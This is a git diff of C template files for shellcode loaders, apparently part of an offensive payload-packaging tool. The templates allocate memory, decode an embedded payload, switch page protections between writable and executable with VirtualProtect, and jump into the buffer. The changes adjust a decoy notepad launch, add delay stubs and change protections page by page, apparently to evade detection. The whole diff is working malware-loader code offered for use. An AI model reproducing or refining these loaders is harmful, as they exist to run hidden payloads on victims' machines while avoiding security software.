diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c index 6a48f2f..c24caad 100644 --- a/data/source/carrier/alloc_rw_rwx/template.c +++ b/data/source/carrier/alloc_rw_rwx/template.c @@ -30,12 +30,15 @@ int main() } // Decoy - WinExec("C:\\windows\\system32\\notepad.exe", 1); + //WinExec("C:\\windows\\system32\\notepad.exe", 1); // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //sleep_ms(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c index af93c81..458742f 100644 --- a/data/source/carrier/alloc_rw_rx/template.c +++ b/data/source/carrier/alloc_rw_rx/template.c @@ -29,10 +29,16 @@ int main() return 6; } + // Decoy + //WinExec("C:\\windows\\system32\\notepad.exe", 1); + // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //Sleep(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c index b85bab9..5251a73 100644 --- a/data/source/carrier/change_rwx_rx/template.c +++ b/data/source/carrier/change_rwx_rx/template.c @@ -22,15 +22,19 @@ int main() // Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // can do only RW otherwise? - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RWX, &result) == 0) { - return 16; - } + for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) { + return 16; + } + } {{ plugin_decoder }} - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) { - return 17; - } + for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) { + return 16; + } + } // Execute *dest (*(void(*)())(dest))();